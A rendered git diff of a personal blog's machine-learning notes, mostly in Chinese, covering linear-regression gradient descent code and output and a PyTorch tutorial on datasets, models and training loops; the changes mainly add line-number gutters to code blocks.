
                  -
                  #Function to calculate the cost
                  def compute_cost(x, y, w, b):

                  m = x.shape[0]
                  cost = 0

                  for i in range(m):
                  f_wb = w * x[i] + b
                  cost = cost + (f_wb - y[i])**2
                  total_cost = 1 / (2 * m) * cost

                  return total_cost
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  #Function to calculate the cost
                  def compute_cost(x, y, w, b):

                  m = x.shape[0]
                  cost = 0

                  for i in range(m):
                  f_wb = w * x[i] + b
                  cost = cost + (f_wb - y[i])**2
                  total_cost = 1 / (2 * m) * cost

                  return total_cost

                  Gradient descent summary

                  So far in this course, you have developed a linear model that predicts $f_{w,b}(x^{(i)})$:

                  @@ -1005,14 +1003,14 @@

                  compute_gradient
                  compute_gradient implements (4) and (5) above and returns $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$. The embedded comments describe the operations.

                  compute_gradient 实现 (4) 和 (5) 并返回 $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$。嵌入的注释描述操作。

                  -
                  def compute_gradient(x, y, w, b): 
                  """
                  Computes the gradient for linear regression
                  计算线性回归的梯度
                  Args:
                  x (ndarray (m,)): Data, m examples
                  y (ndarray (m,)): target values
                  w,b (scalar) : model parameters
                  Returns
                  dj_dw (scalar): The gradient of the cost w.r.t. the parameters w
                  dj_db (scalar): The gradient of the cost w.r.t. the parameter b
                  """

                  # Number of training examples
                  m = x.shape[0]
                  dj_dw = 0
                  dj_db = 0

                  for i in range(m):
                  f_wb = w * x[i] + b
                  dj_dw_i = (f_wb - y[i]) * x[i]
                  dj_db_i = f_wb - y[i]
                  dj_db += dj_db_i
                  dj_dw += dj_dw_i
                  dj_dw = dj_dw / m
                  dj_db = dj_db / m

                  return dj_dw, dj_db
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  def compute_gradient(x, y, w, b): 
                  """
                  Computes the gradient for linear regression
                  计算线性回归的梯度
                  Args:
                  x (ndarray (m,)): Data, m examples
                  y (ndarray (m,)): target values
                  w,b (scalar) : model parameters
                  Returns
                  dj_dw (scalar): The gradient of the cost w.r.t. the parameters w
                  dj_db (scalar): The gradient of the cost w.r.t. the parameter b
                  """

                  # Number of training examples
                  m = x.shape[0]
                  dj_dw = 0
                  dj_db = 0

                  for i in range(m):
                  f_wb = w * x[i] + b
                  dj_dw_i = (f_wb - y[i]) * x[i]
                  dj_db_i = f_wb - y[i]
                  dj_db += dj_db_i
                  dj_dw += dj_dw_i
                  dj_dw = dj_dw / m
                  dj_db = dj_db / m

                  return dj_dw, dj_db

                  png

                  The lectures described how gradient descent utilizes the partial derivative of the cost with respect to a parameter at a point to update that parameter.
                  Let’s use our compute_gradient function to find and plot some partial derivatives of our cost function relative to one of the parameters, $w_0$.

                  课程描述了梯度下降如何利用成本相对于某个点的参数的偏导数来更新该参数。
                  让我们使用compute_gradient函数来查找并绘制成本函数相对于其中一个参数 $w_0$ 的一些偏导数。

                  -
                  plt_gradients(x_train,y_train, compute_cost, compute_gradient)
                  plt.show()
                  +
                  1
                  2
                  plt_gradients(x_train,y_train, compute_cost, compute_gradient)
                  plt.show()

                  png

                  Above, the left plot shows $\frac{\partial J(w,b)}{\partial w}$ or the slope of the cost curve relative to $w$ at three points. On the right side of the plot, the derivative is positive, while on the left it is negative. Due to the ‘bowl shape’, the derivatives will always lead gradient descent toward the bottom where the gradient is zero.

                  上图显示了 $\frac{\partial J(w,b)}{\partial w}$ 或成本曲线相对于 $w$ 的斜率在三个点。在图的右侧,导数为正,而在左侧为负。由于“碗形”,衍生物将始终导致梯度下降到梯度为零的底部。

                  @@ -1023,8 +1021,8 @@

                  compute_gradientGradient Descent 梯度下降

                  Now that gradients can be computed, gradient descent, described in equation (3) above can be implemented below in gradient_descent. The details of the implementation are described in the comments. Below, you will utilize this function to find optimal values of $w$ and $b$ on the training data.

                  现在可以计算梯度,上面等式(3)中描述的梯度下降可以在下面的gradient_descent中实现。注释中描述了实现的详细信息。下面,您将利用此函数在训练数据上找到 $w$ 和 $b$ 的最佳值。

                  -
                  def gradient_descent(x, y, w_in, b_in, alpha, num_iters, cost_function, gradient_function): 
                  """
                  Performs gradient descent to fit w,b. Updates w,b by taking
                  num_iters gradient steps with learning rate alpha
                  执行梯度下降以拟合 w,b。更新 w,b 通过采取
                  num_iters 梯度步长与学习速率 alpha

                  Args:
                  x (ndarray (m,)) : Data, m examples 训练集,m 个样本
                  y (ndarray (m,)) : target values 目标值
                  w_in,b_in (scalar): initial values of model parameters 模型参数的初始值
                  alpha (float): Learning rate 学习率
                  num_iters (int): number of iterations to run gradient descent 运行梯度下降的迭代次数
                  cost_function: function to call to produce cost 调用函数以产生成本
                  gradient_function: function to call to produce gradient 调用以产生渐变的函数

                  Returns:
                  w (scalar): Updated value of parameter after running gradient descent 更新了运行梯度下降后的参数值
                  b (scalar): Updated value of parameter after running gradient descent
                  J_history (List): History of cost values
                  p_history (list): History of parameters [w,b]
                  """

                  w = copy.deepcopy(w_in) # avoid modifying global w_in 避免修改全局 w_in
                  # An array to store cost J and w's at each iteration primarily for graphing later
                  # 一个数组,用于在每次迭代时存储成本 J 和 w,主要用于以后绘制图形
                  J_history = []
                  p_history = []
                  b = b_in
                  w = w_in

                  for i in range(num_iters):
                  # Calculate the gradient and update the parameters using gradient_function
                  # 计算梯度并使用 gradient_function 更新参数
                  dj_dw, dj_db = gradient_function(x, y, w , b)

                  # Update Parameters using equation (3) above
                  # 使用上面的等式(3)更新参数
                  b = b - alpha * dj_db
                  w = w - alpha * dj_dw

                  # Save cost J at each iteration
                  # 每次迭代时节省成本 J
                  if i<100000: # prevent resource exhaustion 防止资源耗尽
                  J_history.append( cost_function(x, y, w , b))
                  p_history.append([w,b])
                  # Print cost every at intervals 10 times or as many iterations if < 10
                  # 打印成本每隔 10 次,如果< 10 次,则迭代次数为 10 次
                  if i% math.ceil(num_iters/10) == 0:
                  print(f"Iteration {i:4}: Cost {J_history[-1]:0.2e} ",
                  f"dj_dw: {dj_dw: 0.3e}, dj_db: {dj_db: 0.3e} ",
                  f"w: {w: 0.3e}, b:{b: 0.5e}")

                  return w, b, J_history, p_history #return w and J,w history for graphing
                  -
                  # initialize parameters
                  w_init = 0
                  b_init = 0
                  # some gradient descent settings
                  iterations = 10000
                  tmp_alpha = 1.0e-2
                  # run gradient descent
                  w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
                  iterations, compute_cost, compute_gradient)
                  print(f"(w,b) found by gradient descent: ({w_final:8.4f},{b_final:8.4f})")
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  29
                  30
                  31
                  32
                  33
                  34
                  35
                  36
                  37
                  38
                  39
                  40
                  41
                  42
                  43
                  44
                  45
                  46
                  47
                  48
                  49
                  50
                  51
                  52
                  53
                  54
                  def gradient_descent(x, y, w_in, b_in, alpha, num_iters, cost_function, gradient_function): 
                  """
                  Performs gradient descent to fit w,b. Updates w,b by taking
                  num_iters gradient steps with learning rate alpha
                  执行梯度下降以拟合 w,b。更新 w,b 通过采取
                  num_iters 梯度步长与学习速率 alpha

                  Args:
                  x (ndarray (m,)) : Data, m examples 训练集,m 个样本
                  y (ndarray (m,)) : target values 目标值
                  w_in,b_in (scalar): initial values of model parameters 模型参数的初始值
                  alpha (float): Learning rate 学习率
                  num_iters (int): number of iterations to run gradient descent 运行梯度下降的迭代次数
                  cost_function: function to call to produce cost 调用函数以产生成本
                  gradient_function: function to call to produce gradient 调用以产生渐变的函数

                  Returns:
                  w (scalar): Updated value of parameter after running gradient descent 更新了运行梯度下降后的参数值
                  b (scalar): Updated value of parameter after running gradient descent
                  J_history (List): History of cost values
                  p_history (list): History of parameters [w,b]
                  """

                  w = copy.deepcopy(w_in) # avoid modifying global w_in 避免修改全局 w_in
                  # An array to store cost J and w's at each iteration primarily for graphing later
                  # 一个数组,用于在每次迭代时存储成本 J 和 w,主要用于以后绘制图形
                  J_history = []
                  p_history = []
                  b = b_in
                  w = w_in

                  for i in range(num_iters):
                  # Calculate the gradient and update the parameters using gradient_function
                  # 计算梯度并使用 gradient_function 更新参数
                  dj_dw, dj_db = gradient_function(x, y, w , b)

                  # Update Parameters using equation (3) above
                  # 使用上面的等式(3)更新参数
                  b = b - alpha * dj_db
                  w = w - alpha * dj_dw

                  # Save cost J at each iteration
                  # 每次迭代时节省成本 J
                  if i<100000: # prevent resource exhaustion 防止资源耗尽
                  J_history.append( cost_function(x, y, w , b))
                  p_history.append([w,b])
                  # Print cost every at intervals 10 times or as many iterations if < 10
                  # 打印成本每隔 10 次,如果< 10 次,则迭代次数为 10 次
                  if i% math.ceil(num_iters/10) == 0:
                  print(f"Iteration {i:4}: Cost {J_history[-1]:0.2e} ",
                  f"dj_dw: {dj_dw: 0.3e}, dj_db: {dj_db: 0.3e} ",
                  f"w: {w: 0.3e}, b:{b: 0.5e}")

                  return w, b, J_history, p_history #return w and J,w history for graphing
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  # initialize parameters
                  w_init = 0
                  b_init = 0
                  # some gradient descent settings
                  iterations = 10000
                  tmp_alpha = 1.0e-2
                  # run gradient descent
                  w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
                  iterations, compute_cost, compute_gradient)
                  print(f"(w,b) found by gradient descent: ({w_final:8.4f},{b_final:8.4f})")
                  Iteration    0: Cost 7.93e+04  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  6.500e+00, b: 4.00000e+00
                   Iteration 1000: Cost 3.41e+00  dj_dw: -3.712e-01, dj_db:  6.007e-01   w:  1.949e+02, b: 1.08228e+02
                   Iteration 2000: Cost 7.93e-01  dj_dw: -1.789e-01, dj_db:  2.895e-01   w:  1.975e+02, b: 1.03966e+02
                  @@ -1060,12 +1058,12 @@ 

                  Cost versus iterations of gradient descent 梯度下降的成本 VS 迭代

                  A plot of cost versus iterations is a useful measure of progress in gradient descent. Cost should always decrease in successful runs. The change in cost is so rapid initially, it is useful to plot the initial decent on a different scale than the final descent. In the plots below, note the scale of cost on the axes and the iteration step.

                  成本与迭代图是梯度下降进度的有用度量。在成功运行时,成本应始终降低。成本的变化最初是如此之快,因此在与最终下降不同的尺度上绘制初始体面是有用的。在下面的图中,请注意轴上的成本比例和迭代步骤。

                  -
                  # plot cost versus iteration  
                  fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True, figsize=(12,4))
                  ax1.plot(J_hist[:100])
                  ax2.plot(1000 + np.arange(len(J_hist[1000:])), J_hist[1000:])
                  ax1.set_title("Cost vs. iteration(start)"); ax2.set_title("Cost vs. iteration (end)")
                  ax1.set_ylabel('Cost') ; ax2.set_ylabel('Cost')
                  ax1.set_xlabel('iteration step') ; ax2.set_xlabel('iteration step')
                  plt.show()
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  # plot cost versus iteration  
                  fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True, figsize=(12,4))
                  ax1.plot(J_hist[:100])
                  ax2.plot(1000 + np.arange(len(J_hist[1000:])), J_hist[1000:])
                  ax1.set_title("Cost vs. iteration(start)"); ax2.set_title("Cost vs. iteration (end)")
                  ax1.set_ylabel('Cost') ; ax2.set_ylabel('Cost')
                  ax1.set_xlabel('iteration step') ; ax2.set_xlabel('iteration step')
                  plt.show()

                  png

                  Predictions 预测

                  Now that you have discovered the optimal values for the parameters $w$ and $b$, you can now use the model to predict housing values based on our learned parameters. As expected, the predicted values are nearly the same as the training values for the same housing. Further, the value not in the prediction is in line with the expected value.

                  现在,您已经发现了参数$w$ 和 $b$ 的最优值,现在可以使用该模型根据我们学习的参数预测住房值。正如预期的那样,预测值几乎与同一住房的训练值相同。此外,预测中没有的值与预期值一致。

                  -
                  print(f"1000sqft house prediction {w_final*1.0 + b_final:0.1f} Thousand dollars")
                  print(f"1200sqft house prediction {w_final*1.2 + b_final:0.1f} Thousand dollars")
                  print(f"2000sqft house prediction {w_final*2.0 + b_final:0.1f} Thousand dollars")
                  +
                  1
                  2
                  3
                  print(f"1000sqft house prediction {w_final*1.0 + b_final:0.1f} Thousand dollars")
                  print(f"1200sqft house prediction {w_final*1.2 + b_final:0.1f} Thousand dollars")
                  print(f"2000sqft house prediction {w_final*2.0 + b_final:0.1f} Thousand dollars")
                  1000sqft house prediction 300.0 Thousand dollars
                   1200sqft house prediction 340.0 Thousand dollars
                   2000sqft house prediction 500.0 Thousand dollars
                  @@ -1074,7 +1072,7 @@ 

                  Pr

                  Plotting

                  You can show the progress of gradient descent during its execution by plotting the cost over iterations on a contour plot of the cost(w,b).

                  您可以通过在成本的等值线图(w,b)上绘制迭代成本来显示梯度下降的执行过程中的进度。

                  -
                  fig, ax = plt.subplots(1,1, figsize=(12, 6))
                  plt_contour_wgrad(x_train, y_train, p_hist, ax)
                  +
                  1
                  2
                  fig, ax = plt.subplots(1,1, figsize=(12, 6))
                  plt_contour_wgrad(x_train, y_train, p_hist, ax)

                  png

                  Above, the contour plot shows the $cost(w,b)$ over a range of $w$ and $b$. Cost levels are represented by the rings. Overlayed, using red arrows, is the path of gradient descent. Here are some things to note:

                    @@ -1088,7 +1086,7 @@

                    Plotting

                  Zooming in, we can see that final steps of gradient descent. Note the distance between steps shrinks as the gradient approaches zero.

                  放大,我们可以看到梯度下降的最后一步。请注意,当梯度接近零时,步长之间的距离会缩小。

                  -
                  fig, ax = plt.subplots(1,1, figsize=(12, 4))
                  plt_contour_wgrad(x_train, y_train, p_hist, ax, w_range=[180, 220, 0.5], b_range=[80, 120, 0.5],
                  contours=[1,5,10,20],resolution=0.5)
                  +
                  1
                  2
                  3
                  fig, ax = plt.subplots(1,1, figsize=(12, 4))
                  plt_contour_wgrad(x_train, y_train, p_hist, ax, w_range=[180, 220, 0.5], b_range=[80, 120, 0.5],
                  contours=[1,5,10,20],resolution=0.5)

                  png

                  Increased Learning Rate

                  @@ -1097,7 +1095,7 @@

                  Incr

                  Let’s try increasing the value of $\alpha$ and see what happens:

                  在讲座中,有一个关于学习速率的适当值的讨论,$\alpha$等式 (3)。$\alpha$越大,梯度下降的速度就越快,就会收敛到一个解决方案。但是,如果它太大,梯度下降将发散。上面你有一个解决方案的例子,它很好地收敛了。
                  让我们尝试增加 $\alpha$ 的值,看看会发生什么:

                  -
                  # initialize parameters
                  w_init = 0
                  b_init = 0
                  # set alpha to a large value
                  iterations = 10
                  tmp_alpha = 8.0e-1
                  # run gradient descent
                  w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
                  iterations, compute_cost, compute_gradient)
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  # initialize parameters
                  w_init = 0
                  b_init = 0
                  # set alpha to a large value
                  iterations = 10
                  tmp_alpha = 8.0e-1
                  # run gradient descent
                  w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
                  iterations, compute_cost, compute_gradient)
                  Iteration    0: Cost 2.58e+05  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  5.200e+02, b: 3.20000e+02
                   Iteration    1: Cost 7.82e+05  dj_dw:  1.130e+03, dj_db:  7.000e+02   w: -3.840e+02, b:-2.40000e+02
                   Iteration    2: Cost 2.37e+06  dj_dw: -1.970e+03, dj_db: -1.216e+03   w:  1.192e+03, b: 7.32800e+02
                  @@ -1112,7 +1110,7 @@ 

                  Incr

                  Above, $w$ and $b$ are bouncing back and forth between positive and negative with the absolute value increasing with each iteration. Further, each iteration $\frac{\partial J(w,b)}{\partial w}$ changes sign and cost is increasing rather than decreasing. This is a clear sign that the learning rate is too large and the solution is diverging.
                  Let’s visualize this with a plot.

                  上面,$w$ 和 $b$ 在正负之间来回反弹,绝对值随着每次迭代而增加。此外,每次迭代 $\frac{\partial J(w,b)}{\partial w}$ 都会改变符号,成本在增加而不是减少。这是一个明显的迹象,表明学习速率太大,解决方案正在发散。让我们用一个情节来可视化它。

                  -
                  plt_divergence(p_hist, J_hist,x_train, y_train)
                  plt.show()
                  +
                  1
                  2
                  plt_divergence(p_hist, J_hist,x_train, y_train)
                  plt.show()
                  ---------------------------------------------------------------------------
                   
                   OverflowError                             Traceback (most recent call last)
                  @@ -5026,6 +5024,8 @@ 

                  目录

                  var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 1-Introduction of Deep Learning/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 1-Introduction of Deep Learning/index.html" index b0ed672505..7a310a2875 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 1-Introduction of Deep Learning/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 1-Introduction of Deep Learning/index.html" @@ -44,8 +44,6 @@ - - @@ -687,8 +685,8 @@

                  安装 pyt

                  下载了 cu117/torch-1.13.1%2Bcu117-cp39-cp39-win_amd64.whl cu117/torchvision-0.14.1%2Bcu117-cp39-cp39-win_amd64.whl

                  在下载到的目录进入 cmd 使用pip install torch-l.13.1+cul17-cp39-cp39-win amd64.whlpip install torchvision-0.14.1+cu117-cp39-cp39-win amd64.whl安装。

                  在 python 中验证:

                  -
                  import torch

                  print(torch.__version__)
                  print(torch.cuda.is_available()) # cuda 显卡是否可以使用
                  -
                  1.13.1+cu117
                  True
                  +
                  1
                  2
                  3
                  4
                  import torch

                  print(torch.__version__)
                  print(torch.cuda.is_available()) # cuda 显卡是否可以使用
                  +
                  1
                  2
                  1.13.1+cu117
                  True

                  Training Neural Networks

                  训练神经网络的步骤:

                    @@ -702,17 +700,17 @@

                    Dataset & Dataloader

                    DataSet: 存储数据样本 $x$ 和预期值 $y$

                    Dataloader: 对数据进行分批分组 groups data in batches,实现多任务处理

                    -
                    dataset = MyData(file)
                    dataloader = DataLoader(dataset, batch_size, shuffle=True)
                    +
                    1
                    2
                    dataset = MyData(file)
                    dataloader = DataLoader(dataset, batch_size, shuffle=True)

                    机器学习,深度学习模型训练阶段的 Shuffle 重要么?为什么?_技术宅 zch 的博客-CSDN 博客_深度学习 shuffle

                    • 对于 Training 和 Validation,需要打乱,shuffle=True
                    • 对于 Testing,不需要打乱,shuffle=False

                    如下列代码就将数据集分成 5 给 batch:

                    -
                    dataset = MyDataset(file)
                    dataloader = DataLoader(dataset, batch_size=5, shuffle=False)
                    +
                    1
                    2
                    dataset = MyDataset(file)
                    dataloader = DataLoader(dataset, batch_size=5, shuffle=False)

                    png

                    设计一个 MyDataset 类用于管理数据集:

                    -
                    from torch.utils.data import Dataset, DataLoader


                    class MyDataset(Dataset):
                    def __init__(self, file):
                    """读取数据并初始化"""
                    self.data = ...


                    def __getitem__(self, index):
                    """返回一个数据"""
                    return self.data[index]


                    def __len__(self):
                    """返回数据集的大小"""
                    return len(self.data)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    from torch.utils.data import Dataset, DataLoader


                    class MyDataset(Dataset):
                    def __init__(self, file):
                    """读取数据并初始化"""
                    self.data = ...


                    def __getitem__(self, index):
                    """返回一个数据"""
                    return self.data[index]


                    def __len__(self):
                    """返回数据集的大小"""
                    return len(self.data)
                    Tensors

                    pytorch 中的 Tensors 就是高维数组,相当于 numpy 中的 array

                    dim in PyTorch == axis in NumPy

                    @@ -720,38 +718,38 @@
                    创建 tenso
                    • 直接填入数据,list 或 numpy.ndarray
                    -
                    x = torch.tensor([[1, -1], [-1, 1]])
                    -
                    x = torch.from_numpy(np.array([[1, -1], [-1, 1]]))
                    +
                    1
                    x = torch.tensor([[1, -1], [-1, 1]])
                    +
                    1
                    x = torch.from_numpy(np.array([[1, -1], [-1, 1]]))
                    • 输入形状,填入 0 或 1
                    -
                    x = torch.zeros([2, 2])
                    -
                    x = torch.ones([1, 2, 5])
                    +
                    1
                    x = torch.zeros([2, 2])
                    +
                    1
                    x = torch.ones([1, 2, 5])
                    常见运算符
                    • 加法
                    -
                    z = x + y
                    +
                    1
                    z = x + y
                    • 减法
                    -
                    z = x - y
                    +
                    1
                    z = x - y
                    • 乘方
                    -
                    y = x.pow(2)
                    +
                    1
                    y = x.pow(2)
                    • 求和
                    -
                    y = x.sum()
                    +
                    1
                    y = x.sum()
                    • 均值
                    -
                    y = x.mean()
                    +
                    1
                    y = x.mean()
                    • 转置
                    -
                    x = x.transpose(0, 1)
                    +
                    1
                    x = x.transpose(0, 1)
                    • Squeeze 移出某个维度
                    @@ -820,64 +818,64 @@
                    PyTorch v.s. Nu
                    Device

                    自行选择 CPU 或 Cuda 对 Tensors 进行运算。

                    CPU

                    -
                    x = x.to(‘cpu’)
                    +
                    1
                    x = x.to(‘cpu’)

                    GPU

                    -
                    x = x.to(‘cuda’)
                    +
                    1
                    x = x.to(‘cuda’)
                    计算梯度

                    定义 $x$,并事先告知需要计算梯度 requires_grad=True

                    $$x=\begin{bmatrix}1 & 0 \ -1 & 1\end{bmatrix}$$

                    -
                    x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)
                    +
                    1
                    x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)

                    $$z=\sum_i\sum_j x^2_{i,j}$$

                    -
                    z = x.pow(2).sum()
                    +
                    1
                    z = x.pow(2).sum()

                    求导

                    $$\frac{\partial z}{\partial x_{i,j}}=2x_{i,j}$$

                    -
                    z.backward()
                    +
                    1
                    z.backward()

                    得到 $x$ 的梯度

                    $$\frac{\partial z}{\partial x}=\begin{bmatrix}2&0\-2&2\end{bmatrix}$$

                    -
                    x.grad
                    -
                    tensor([[ 2., 0.], [-2., 2.]])
                    +
                    1
                    x.grad
                    +
                    1
                    tensor([[ 2., 0.], [-2., 2.]])

                    Step 2.torch.nn.Module

                    • 全连接层
                    -
                    layer = torch.nn.Linear(32, 64)
                    +
                    1
                    layer = torch.nn.Linear(32, 64)
                    • 激活函数
                    -
                    nn.Sigmoid()
                    nn.ReLU()
                    +
                    1
                    2
                    nn.Sigmoid()
                    nn.ReLU()

                    将定义的神经网络模型放在MyModel类中:

                    -
                    import torch.nn as nn
                    class MyModel(nn.Module):
                    def __init__(self):
                    """初始化你的模型,定义神经网络层"""
                    super(MyModel, self).__init__()
                    self.net = nn.Sequential(
                    nn.Linear(10, 32),
                    nn.Sigmoid(),
                    nn.Linear(32, 1)
                    )


                    def forward(self, x):
                    """计算你的 NN 的输出"""
                    return self.net(x)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    import torch.nn as nn
                    class MyModel(nn.Module):
                    def __init__(self):
                    """初始化你的模型,定义神经网络层"""
                    super(MyModel, self).__init__()
                    self.net = nn.Sequential(
                    nn.Linear(10, 32),
                    nn.Sigmoid(),
                    nn.Linear(32, 1)
                    )


                    def forward(self, x):
                    """计算你的 NN 的输出"""
                    return self.net(x)

                    可以不使用nn.Sequential,效果与下面的代码作用一致

                    -
                    import torch.nn as nn

                    class MyModel(nn.Module):
                    def __init__(self):
                    super(MyModel, self).__init__()
                    self.layer1 = nn.Linear(10, 32)
                    self.layer2 = nn.Sigmoid(),
                    self.layer3 = nn.Linear(32,1)


                    def forward(self, x):
                    out = self.layer1(x)
                    out = self.layer2(out)
                    out = self.layer3(out)
                    return out
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    import torch.nn as nn

                    class MyModel(nn.Module):
                    def __init__(self):
                    super(MyModel, self).__init__()
                    self.layer1 = nn.Linear(10, 32)
                    self.layer2 = nn.Sigmoid(),
                    self.layer3 = nn.Linear(32,1)


                    def forward(self, x):
                    out = self.layer1(x)
                    out = self.layer2(out)
                    out = self.layer3(out)
                    return out

                    Step 3.torch.nn.MSELoss torch.nn.CrossEntropyLoss etc.

                    定义损失函数

                    • MSE
                    -
                    criterion = nn.MSELoss()
                    +
                    1
                    criterion = nn.MSELoss()
                    • 交叉熵损失函数
                    -
                    criterion = nn.CrossEntropyLoss()
                    +
                    1
                    criterion = nn.CrossEntropyLoss()
                    • 输入预测值和实际值计算 loss
                    -
                    loss = criterion(model_output, expected_value)
                    +
                    1
                    loss = criterion(model_output, expected_value)

                    Step 4.torch.optim

                    找到一个函数以减少 loss 的值,如 随机梯度下降法 Stochastic Gradient Descent (SGD)

                    -
                    torch.optim.SGD(model.parameters(), lr, momentum = 0)
                    +
                    1
                    torch.optim.SGD(model.parameters(), lr, momentum = 0)

                    Step 5.Entire Procedure

                    Neural Network Training Setup

                    完整流程:读取数据-分割数据-定义模型-定义损失函数-定义优化函数

                    -
                    dataset = MyDataset(file)
                    tr_set = DataLoader(dataset, 16, shuffle=True)
                    model = MyModel().to(device)
                    criterion = nn.MSELoss()
                    optimizer = torch.optim.SGD(model.parameters(), 0.1)
                    +
                    1
                    2
                    3
                    4
                    5
                    dataset = MyDataset(file)
                    tr_set = DataLoader(dataset, 16, shuffle=True)
                    model = MyModel().to(device)
                    criterion = nn.MSELoss()
                    optimizer = torch.optim.SGD(model.parameters(), 0.1)
                    Neural Network Training Loop

                    训练过程:

                    -
                    for epoch in range(n_epochs):  # 进行一个 epoch
                    model.train() # 将模型设为 train 模式
                    for x, y in tr_set: # 从 dataloader 中读入 x, y
                    optimizer.zero_grad() # 将梯度设为 0
                    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
                    pred = model(x) # 前向传播(得到输出值)
                    loss = criterion(pred, y) # 计算 loss
                    loss.backward() # 计算梯度(backpropagation)
                    optimizer.step() # 优化参数
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    for epoch in range(n_epochs):  # 进行一个 epoch
                    model.train() # 将模型设为 train 模式
                    for x, y in tr_set: # 从 dataloader 中读入 x, y
                    optimizer.zero_grad() # 将梯度设为 0
                    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
                    pred = model(x) # 前向传播(得到输出值)
                    loss = criterion(pred, y) # 计算 loss
                    loss.backward() # 计算梯度(backpropagation)
                    optimizer.step() # 优化参数
                    Neural Network Validation Loop

                    上接上面的 epoch 循环:

                    -
                    model.eval()  # 将模型设为 evaluation 模式
                    total_loss = 0 # 初始化 loss
                    for x, y in dv_set: # 从 dataloader 中读入 x, y
                    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
                    with torch.no_grad(): # 禁用梯度计算
                    pred = model(x) # 计算输出值 pred
                    loss = criterion(pred, y) # 计算 loss
                    total_loss += loss.cpu().item() * len(x) # 将所有 loss 加到一起
                    avg_loss = total_loss / len(dv_set.dataset) # 计算平均 loss
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    model.eval()  # 将模型设为 evaluation 模式
                    total_loss = 0 # 初始化 loss
                    for x, y in dv_set: # 从 dataloader 中读入 x, y
                    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
                    with torch.no_grad(): # 禁用梯度计算
                    pred = model(x) # 计算输出值 pred
                    loss = criterion(pred, y) # 计算 loss
                    total_loss += loss.cpu().item() * len(x) # 将所有 loss 加到一起
                    avg_loss = total_loss / len(dv_set.dataset) # 计算平均 loss
                    Neural Network Testing Loop
                    -
                    model.eval()  # 将模型设为 evaluation 模式
                    preds = [] # 定义一个列表存储预测值
                    for x in tt_set: # 从 dataloader 中读入 x
                    x = x.to(device) # 将数据放入设备(CPU/Cuda)
                    with torch.no_grad(): # 禁用梯度计算
                    pred = model(x) # 计算输出值 pred,即预测结果
                    preds.append(pred.cpu()) # 生成预测结果
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    model.eval()  # 将模型设为 evaluation 模式
                    preds = [] # 定义一个列表存储预测值
                    for x in tt_set: # 从 dataloader 中读入 x
                    x = x.to(device) # 将数据放入设备(CPU/Cuda)
                    with torch.no_grad(): # 禁用梯度计算
                    pred = model(x) # 计算输出值 pred,即预测结果
                    preds.append(pred.cpu()) # 生成预测结果
                    Notice - model.eval(), torch.no_grad()
                    • model.eval() 改变一些模型层的行为,如 dropout 和 batch normalization。
                    • @@ -887,11 +885,11 @@
                      torch.save(model.state_dict(), path)
                      +
                      1
                      torch.save(model.state_dict(), path)
                      • Load
                      -
                      ckpt = torch.load(path)  # 保存文件路径
                      model.load_state_dict(ckpt) # 保存 ckpt 文件
                      +
                      1
                      2
                      ckpt = torch.load(path)  # 保存文件路径
                      model.load_state_dict(ckpt) # 保存 ckpt 文件

                      More About PyTorch

                      • torchaudio @@ -1333,46 +1331,46 @@

                        HW1

                        Download data

                        https://www.kaggle.com/competitions/ml2022spring-hw1 获取数据集 covid.train.csvcovid.test.csv

                        Import packages

                        -
                        # 数值运算
                        import math
                        import numpy as np
                        # 读写数据
                        import pandas as pd
                        import os
                        import csv
                        # 进度条
                        from tqdm import tqdm
                        # Pytorch
                        import torch
                        import torch.nn as nn
                        from torch.utils.data import Dataset, DataLoader, random_split
                        # 绘制学习曲线
                        from torch.utils.tensorboard import SummaryWriter
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        # 数值运算
                        import math
                        import numpy as np
